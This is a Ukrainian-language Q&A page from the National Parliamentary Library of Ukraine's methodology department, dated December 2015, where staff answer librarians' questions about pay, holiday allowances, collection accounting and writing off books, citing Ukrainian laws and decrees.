Питання №5862 Oksana 31/12/2015 × 12:25
Доброго дня!
  Я працюю в медичній бібліотеці, керівництво лікарні повідомило, що в 2016 р.  я як працівник бібліотеки не маю право на допомогу на оздоровлення при наданні мені щорічної відпустки взагалі, і що в 2016 році оздоровчі мають право отримувати виключно медичні працівники.     Поясніть будь-ласка чи їхні дії не порущують закон ?. І на які документи ссилатись щоб доводити своє право на отримання цієї допомоги. Оскільки допомогу на оздоровлення при наданні щорічної відпустки гарантовано державою.
Може в 2016 р. якась з'явилась "спеціальна економія "  про яку мені не відомо. Дякую !


Відповідь. Якщо лікарня є державним або комунальним закладом, а бібліотека є її структурним підрозділом, Ви маєте право на отримання допомоги на оздоровлення при наданні щорічної відпустки. Отримання допомоги на оздоровлення гарантовано: ст. 30 ЗУ «Про бібліотеки і бібліотечну справу» (від 27.01.1995 № 32/95-ВР, із змінами); Постановою КМУ від 30.08.2002р. №1298 «Про оплату праці працівників на основі Єдиної тарифної сітки розрядів і коефіцієнтів з оплати праці працівників установ, закладів та організацій окремих галузей бюджетної сфери»; Постановою КМУ від 30 вересня 2009 р. № 1062 «Про доповнення постанови Кабінету Міністрів України від 22 січня 2005 р. № 84».
Питання №5861 Viktoria 30/12/2015 × 21:06
Уважаемые работники парламентской библиотеки! Примите поздравления с наступающим Новым годом и Рождеством!
 Здоровья, счастья, мира всем Вам и Вашим близким!e
Відповідь. ДЯКУЄМО !!! Також бажаємо:

Щоб веселим був цей рік

Без журби, війни та бід!

Більше злагоди, любові

Миру,щастя та добра,

Від Карпат аж до Дніпра!smile
Питання №5860 Olga 28/12/2015 × 17:16
В січні 2014 року наша районна бібліотечна система була реорганізована та за причини зменшення показників (читачі, відвідування, книговидача) за останні 3 роки, бібліотеки району були переведені  поза групою оплати праці. Згідно Постанови МКУ № 745 оплата праці нараховувалась так:
директору за 12 розрядом, методисту, зав.відділами - за 11 розрядом, бібліографу, бібліотекарю - за 10 розрядом і зав.сільськими  бібліотеками - за 11 розрядом. З усіх окладів  щомісячно вираховується 10 відсотків в зв'язку з переведенням  на оплату праці поза групою. Чи вірно це? Інспертор з питань праці стверджує, що зніматися 10 відсотків має тільки з окладу директора, а з працівників - ні.
Дякую.
Відповідь. Згідно Наказу МКУ № 745 від 18.10.2005 (із змінами) : «Посадові оклади керівників установ з обсягом роботи нижче показників IV групи встановлюються на 10 відсотків нижче посадових окладів, передбачених для аналогічних працівників IV групи. У бібліотеках з обсягом роботи нижче показників, передбачених для бібліотек IV групи, які є структурними підрозділами установи, підприємства або організації, посадові оклади завідувачів установлюються на рівні посадових окладів бібліотекарів відповідної категорії, передбачених у табл. 1 додатка 3». Перелік керівного складу бібліотек наведено в «Довіднику кваліфікаційних характеристик професій працівників. Випуск 81 "Культура та мистецтво", затвердженого наказом Міністерства культури і мистецтв України від 14.04.2000 р. N 168 (див. розділ сайту «Матеріали», лінк «Довідкові видання» – «Бібліотеки в правовому полі»: http://profy.nplu.org/download.php?lng=uk ). Дозволимо нагадати, що Довідник є нормативним документом, обов'язковим з питань управління персоналом.
Питання №5859 Nikа 28/12/2015 × 14:13
Підкажіть будь ласка, окрім Інструкції з обліку БФ, який ще документ регулює цей облік? Дякую.

Відповідь. НАЦІОНАЛЬНЕ ПОЛОЖЕННЯ (СТАНДАРТ) бухгалтерського обліку в державному секторі 121 "Основні засоби" (НП(С)БО 121), затверджено Наказом Міністерства фінансів України 12.10.2010 № 1202 Режим доступу: http://zakon3.rada.gov.ua/laws/show/z1017-10 .
Питання №5858 Olga 25/12/2015 × 19:47
Добрий день. Повертаючись до питання №5850. Тобто бібліотекарям обласних бібліотек (і, мабуть, не тільки) з грудня місяця повинні бути пыдвищені посадові оклади, в обов’язковому порядку? Чи може адміністрація їх не підвищувати? Чи непідвищення буде порушенням? Дякую.
Відповідь. Так, мають бути підвищені в обов’язковому порядку. З 1 грудня 2015 року посадові оклади працівників бюджетних установ, закладів та організацій окремих галузей бюджетної сфери встановлюються у розмірах, передбачених пунктом 1 постанови КМУ «Про упорядкування структури заробітної плати, особливості проведення індексації та внесення змін до деяких нормативно-правових актів» від 9 грудня 2015 р.№ 1013. Також, Міністерство соціальної політики звертає увагу, що згідно з пунктом 4 постанови керівники установ, закладів, організацій окремих галузей бюджетної сфери та органів виконавчої влади, місцевого самоврядування, прокуратури та інших органів мають забезпечити внесення змін до штатного розпису установ, закладів та організацій, відповідних органів з урахуванням нових розмірів посадових окладів (тарифних ставок, ставок заробітної плати) з 1 грудня 2015 року.
Питання №5857 Lilia 25/12/2015 × 13:02
Добрий день. Я завідуюча сільською публічною бібліотекою-філіалом Богородчанського району. Наша бібліотека перейшла на баланс об'єднаної Старобогородчанської територіальної громади. Чи мають право нараховувати нам меншу заробітню плату ніж була до цього часу. В тому числі нарахування 50% до зарплати (Юлія Тимошенко дала).
Відповідь. Очевидно, ЦБС мала певну групу за оплатою праці. Змінивши власника, ставши самостійною бібліотекою Ваша бібліотека стала поза групою по оплаті праці. Розмір зарплати залежить від посади, тарифного розряду, який визначається постановою КМ України «Про упорядкування структури заробітної плати, особливості проведення індексації та внесення змін до деяких нормативно-правових актів» від 9 грудня 2015 р.№ 1013 та наказом МКУ України від 18.10.2005 №745. Відповідно Постанови КМУ від 25 березня 2014 р. № 89 надбавка за особливі умови роботи є обов’язковою виплатою, але змінено її розмір (замість фіксованих 50 % - у граничному розмірі 50 %). На сьогоднішній день право визначати конкретний розмір надбавки надано керівнику установи у межах фонду оплати праці. Залишився незмінним Порядок виплати доплати за вислугу років працівникам державних і комунальних бібліотек (затверджено постановою Кабінету Міністрів України від 22 січня 2005 р.N 84).

Новий засновник зобов’язаний забезпечувати у повному обсязі фінансові потреби бюджетної установи.
Питання №5856 Ksenia 25/12/2015 × 09:32
Доброго дня. Читаючи регулярно питання і відповіді, звернули увагу на питання 5771 від 5 листопада щодо Наказу Міністерства культури України «Про впровадження електронного моніторингу базової мережі публічних бібліотек» від 02.10.2015 №780. Ви відповіли, що наказ був розісланий на обласні управління культури. Протягом всього цього часу зверталися до нашого управління (Миколаївська область), де нам відповідали, що такого наказу не отримували. На сайті МКУ останнє оновлення і поповнення розділу "Нормативно-правові акти у сфері бібліотечної справи" відбулося 16 вересня (!!! щоб ми так вели свої сайти! оце так прозорість, доступність та оперативність!) і звичайно цього наказу там немає.  І ось 10 грудня ми отримали Наказ нашого управління "Про надання річних звітів", де прописано, зокрема, подачу звітів 6-НК і жодного слова про електронний моніторинг. Дуже до Вас велике прохання - надішліть, будь ласка, нам на електронну пошту текст Наказу МКУ «Про впровадження електронного моніторингу базової мережі публічних бібліотек». Заздалегідь вдячні, що Ваша бібліотека виконує не тільки свої функції, але й нашого "рідного" міністерства, а тепер ще й регіонального галузевого управління.
Відповідь. Лист надіслано 29.12.15р. о 16.40.
Питання №5855 victoria 23/12/2015 × 19:05
Уважаемые коллеги! Подскажите как сейчас правильно шифруется литература Р1;Р2;У1;У2? Остались ли И-иностранная литература;С-литература народов СССР; А-античная?

Подскажите как правильно составить акт на списание газет и журналов.
Відповідь. 1). Останні 40 років бібліотеки України в практичній діяльності користувались ББК та УДК. Наприклад, за ББК для масових бібліотек вищезазначена література буде мати шифри: У1 – 84(4УКР)1; Р2 – 84(4РОС)6 : И - 84(4/8) Твори літератури зарубіжних країн. За ББК для наукових бібліотек: А-антична література – Ш44(0){32} Антична література.

2). Порядок списання книг, брошур, періодики, аудіовізуальних видань,– однаковий. Акти щодо вилучення документів складаються згідно:"Інструкції з обліку документів, що знаходяться в бібліотечних фондах" (Режим доступу: http://zakon1.rada.gov.ua/cgi-bin/laws/main.cgi?nreg=z0530-07) та Інструкція зі складання типових форм з обліку та списання основних засобів, що належать установам і організаціям (затверджено наказом Головного управління Державного казначейства України та Державного комітету статистики України 02.12.97 р. N 125/70 /Режим доступу: http://zakon3.rada.gov.ua/laws/show/z0612-97 ). Звертаємо увагу на типову форму ОЗ-5 (бюджет) "Акт про списання з балансу бюджетних установ і організацій вилученої з бібліотеки літератури". В Описі до акту необхідно передбачити графи: №п/п, назва періодичного видання, кількість примірників, рік видання, відділ.
Питання №5854 Nataliya 23/12/2015 × 14:28
http://ounb.lutsk.ua
Доброго дня! Скажіть, будь ласка, як правильно бібліотеці оформити приймання і передачу книг, зібраних від користувачів для формування бібліотечок воїнам АТО?
Відповідь. Передача книг до Будинків офіцерів чи бібліотек військових частин в рамках реалізації Всеукраїнської акції "Бібліотека українського воїна" відбувається через оформлення :

1. Акт безоплатного приймання-передачі книг (загальноприйнята форма, акт підписується двома сторонами)

2. Перелік книг, що надійшли до (.....назва бібліотеки) в ході реалізації Всеукраїнської акції "Бібліотека українського воїна" і передаються до (.....назва в/ч чи Будинку офіцерів) у ..... кварталі 2015 року.

Відділ соціо-культурної діяльності

Питання №5853 Nadiy 23/12/2015 × 14:01

Добрий день! Підкажіть будь-ласка, чи торкнулась декомунізація публічних бібліотек (як бути з літературою в томах Леніна, Сталіна і т.д.). Чи можна їх вилучати з фонду і як (зношена, морально застаріла). Дякуємо за відповідь!
Відповідь. Пропонуємо задати собі питання: наскільки інтенсивно використовувались вищезазначені видання у Вашій бібліотеці останні двадцять років і невже вони не мають зношеного виду? Причини списання БФ прописані в: ст. 18 ЗУ «Про бібліотеки і бібліотечну справу» (від 27.01.95 р. N 32/95-ВР, із змінами), п.9.1 Положення з бухгалтерського обліку необоротних активів бюджетних установ (затверджено Наказом Міністерства фінансів України 26.06.2013 № 611 /Режим доступу: http://zakon1.rada.gov.ua/laws/show/z1214-13/page4 ), п.3.5 «Типових правил користування бібліотеками в Україні»(затверджено Наказом МКТ України 05.05.99 N 275, із змінами /Режим доступу: http://zakon4.rada.gov.ua/laws/show/z0449-99 ).
Питання №5852 Nado 23/12/2015 × 10:03
Працюю в бібліотеці 15 років  освіта середня. Директор бібліотеки каже, що потрібно здобути мені вищу спеціальну освіту такі кваліфікаційні вимоги до моєї посади згідно «Довідника кваліфікаційних характеристик професій працівників. "Культура та мистецтво". Я не буду вчитись уже пенсіонерка. Чи можуть мене звільнити?
Відповідь. Просимо уточнити, а на якій посаді Ви працюєте?
Питання №5851 oleksandra 22/12/2015 × 12:14
Доброго дня, шановні колеги. Підкажіть будь ласка, чи може провідний бібліотекар керувати роботою читального залу(освіта вища спеціальна, стаж роботи більше 15 років).
Яку роботу може виконувати провідний бібліотекар?
Відповідь. Провідний бібліотекар є професіоналом, але не належить до керівного складу. Пропонуємо ознайомитись з «Довідником кваліфікаційних характеристик професій працівників» (випуск 81. Культура і мистецтво. Розділ «Бібліотеки, централізовані бібліотечні системи»), затверджений наказом Міністерства культури і мистецтв України № 168 від 14 квітня 2000 р.
Питання №5850 Olga 22/12/2015 × 10:32
Добрий день. З наступаючими святами! Чи стосується Постанова КМУ від 09.12.2015 р. №1013 бібліотекарів обласних бібліотек? Дякую.
Відповідь. Стосується.
Питання №5849 Valentina 21/12/2015 × 08:36
Пішов  процес об'єднання громад, з нашої ЦБС  2 сільські філії  мають перспективу вже  з січня  перейти  на  їх повне  утримання. Чи  розробляються  Вами  спільно з Мінкультури  якісь хоча б рекомендаційні  методичні матеріали щодо  ролі  районної бібліотеки  для переданих на баланс громад сільських бібліотек? Чи будуть вони підпадати під дії наказів Мінкультури, чи будуть (і кому) вони подавати статистичні звіти,  хто контролюватиме стан їх роботи (в т.ч. стан службової документації і т.д. (керівники громад - не спеціалісти в нашій галузі).
Відповідь. 1). Мінкультури є головним органом у системі центральних органів виконавчої влади, що забезпечує формування та реалізує державну політику у сферах культури та мистецтв. Міністерство культури України здійснює відповідно до законодавства координацію діяльності бібліотек, а також контроль за діяльністю бібліотек, що перебувають у державній та комунальній власності, збереження ними бібліотечного фонду України. Відповідно,самостійні сільські публічні бібліотеки підпадають під дію Мінкультури. 2). Якщо бібліотеки-філії передано до сільрад, то саме сільські ради забезпечують правові, організаційні, фінансові та матеріальні умови для функціонування бібліотек. Після перемовин районного відділу культури з головою сільради (а можливо і старостою) у новому Положенні про сільську бібліотеку варто буде прописати пункт, який би закріплював здійснення РБ загальної методичної допомоги самостійним сільським бібліотекам. Також варто розглянути можливість укладання відповідних договорів про співпрацю.
Питання №5848 Tatyana 19/12/2015 × 07:55
Здравствуйте! Разъясните пожалуйста будет ли выплачиваться индексация после последнего повышения зарплаты? В бухгалтерии нам сказали, что её отменили.
Відповідь. Питання поза межами нашої компетенції. Тому, враховуючи внесення різнопланових змін до деяких нормативно-правових актів, пропонуємо переадресувати запит до Міністерства соцполітики та Міністерства фінансів України щодо отримання фахової відповіді.
Питання №5847 Galina 18/12/2015 × 11:06
Добрий день!Підкажіть, якщо бібліотека змінює власника, чи звільняються з цієї підстави бібліотечні працівники? Дякую.
Відповідь. Ні, не звільняються. Зміна підпорядкованості не припиняє дії трудового договору (частини третя та четверта ст. 36 КЗпП). У разі зміни власника, а також реорганізації (злиття, приєднання, поділу, виділення, перетворення) дія трудового договору працівника продовжується. Припинення трудового договору з ініціативи роботодавця можливе лише в разі скорочення чисельності або штату працівників (п.1 частини першої ст. 40 КЗпП). У такому випадку трудовий договір до закінчення строку його чинності можуть бути розірвані роботодавцем.
Питання №5846 Tetyana 18/12/2015 × 09:50
Доброго дня! З підступаючими святами!
У нас виникло питання: чи вважається настільна гра, подарована бібліотеці - книжковим виданням, чи врахувати її як майно бібліотеки?
Дякую і з наступаючими святами!
Відповідь. Ні, не вважається. Це майно бібліотеки. Настільну гру необхідно оцінити і оприбуткувати.

Дякуємо за привітання!
Питання №5845 victoria 17/12/2015 × 18:52
Уважаемые коллеги! Хочу уточнить, как с Нового года будет осуществляться дарение книг от читателей? Будут ли внесены какие то изменения в порядке дарения, документации? Сохранится ли книга дарений? Прошу дать ссылку на материалы.
Відповідь. Нам нічого невідомо щодо «книги дарений». Тому, повідомляємо наступне:

Книги, отримані бібліотекою безоплатно від користувачів, приймає комісія, до складу якої обов’язково входить працівник бухгалтерської служби. Комісія оцінює видання і складає відповідний акт, в якому зазначає найменування і вартість отриманих книг. На підставі складеного акта операції з безоплатного отримання відображаються в бухобліку.

Якщо достовірна інформація щодо первісної вартості отриманих книг відсутня, її визначають на рівні справедливої вартості на дату отримання. Щоб визначена справедлива вартість була обґрунтованою, комісія повинна проаналізувати ціни, що склалися на вільному ринку на аналогічні книги, або якщо на балансі бібліотеки обліковуються подібні книги, то можна визначати справедливу вартість отриманих книг на рівні тих, що вже є обліку.

Пропонуємо переглянути: Положення про інвентаризацію активів та зобов’язань (затверджено Наказом Міністерства фінансів України № 879 від 02.09.2014р.) ; Національне положення (стандарт) бухгалтерського обліку в державному секторі 121 "Основні засоби" (затверджено Наказом Міністерства фінансів України № 1202 від 12.10.2010 р.); п. 5, п.15 Методичних рекомендацій з бухгалтерського обліку основних засобів суб'єктів державного сектору (затверджено Наказом Міністерства фінансів України від 23 січня 2015 року N 11). Також, пропонуємо організувати консультаційну годину із бухгалтерською службою, щодо облікової політики в бюджетній установі.
Питання №5844 irina 17/12/2015 × 14:39
Доброго дня, шановні колеги! Будь ласка, роз’ясніть ситуацію: бібліотекар працює на 0,5 ставки. В той же час він є студентом стаціонару і отримує стипендію. Чи правомірно йому індексувати заробітну плату в бібліотеці? Дякую.  
Відповідь. В першу чергу індексується стипендія. Щоб проіндексувати зарплату ВУЗ на вимогу роботодавця зобов’язаний видати довідку про розмір і строк призначеної стипендії. На підставі цього документа індексують зарплату за місцем роботи у межах прожиткового мінімуму для працездатних осіб з урахуванням одержаної проіндексованої стипендії (див. Порядок проведення індексації грошових доходів населення, затверджений Постановою Кабінету Міністрів України від 17 липня 2003 р. № 1078, із змінами /Режим доступу: http://zakon1.rada.gov.ua/laws/show/1078-2003-%D0%BF ).
Питання №5843 VALENTINA 15/12/2015 × 20:47
Скажіть будь ласка. Я маю 21 рік бібліотечного стажу, в листопаді місяці я пішла працювати секретарем сільської ради. Чи враховується стаж бібліотекаря на посаді секретаря, чи маю право після закінчення повноважень повернутися на роботу в бібліотеку
Відповідь. 1. Секретар сільської, селищної, міської ради не може суміщати свою службову діяльність з іншою посадою, у тому числі на громадських засадах, займатися іншою оплачуваною (крім викладацької, наукової і творчої діяльності, медичної практики, інструкторської та суддівської практики із спорту) або підприємницькою діяльністю (ч. 1 ст. 50 ЗУ "Про місцеве самоврядування в Україні").Секретар сільської ради обирається сільською радою з числа її депутатів та працює в раді на постійній основі. Умови оплата праці працівників органів місцевого самоврядування, у тому числі голів і секретарів сільських та селищних рад, затверджені постановою Кабінету Міністрів України від 9 березня 2006 р. № 268 ” Про упорядкування структури та умов оплати праці працівників апарату органів виконавчої влади, органів прокуратури, судів та інших органів ”. Пропонуємо ознайомитись із Схемою посадових окладів керівних працівників і спеціалістів апарату сільських і селищних рад та їх виконавчих органів, наведеною в Додатку 54 Постанови №268. Стаж бібліотекаря на посаді секретаря не враховується.

2. Після закінчення повноважень передбачено надання попередньої роботи (посади), а за її відсутності – іншої рівноцінної роботи (посади) на тому ж самому або, за згодою працівника, на іншому підприємстві, в установі, організації (абз. 1 ч.2 ст. 33 ЗУ «Про статус депутатів місцевих рад»). Час роботи депутата у місцевій раді на постійній основі зараховується до загального і безперервного стажу роботи (служби) депутата, а також стажу роботи (служби) за тією спеціальністю, за якою він працював до обрання на виборну посаду в раді.
StartПопередні [ 1 2 3 4 5 6 7 8 9 10 ] 10 next pagesНаступніEnd

Актуальна інформація

Вітаємо шановних відвідувачів на сайті, який супроводжує методичний відділ Національнальної парламентської бібліотеки України (НПБУ). Наш відділ є науково-методичним та інформаційно-консультативним центром для публічних бібліотек України, а також співпрацює з бібліотеками різних типів і форм власності.

Пам'ятайте, що наповнення цього сайту - наша спільна робота. Якщо Ви маєте матеріали, що можуть зацікавити бібліотечну спільноту, або бажаєте підняти актуальну тему - чекаємо Ваших пропозицій на адресу method@nplu.org.

Шановні колеги! Якщо у вас змінилися реквізити (адреса, e-mail, URL, телефон тощо) надішліть повідомлення для відповідних коректив на сторінці сайту „Бібліотеки України”.


Вітаємо
For Librarians
Библиотекарю
ПошукГолосування
Як формування об'єднаних територіальних громад вплине на публічні бібліотеки?
 
позитивно вплине
негативно
не буде впливати
Результати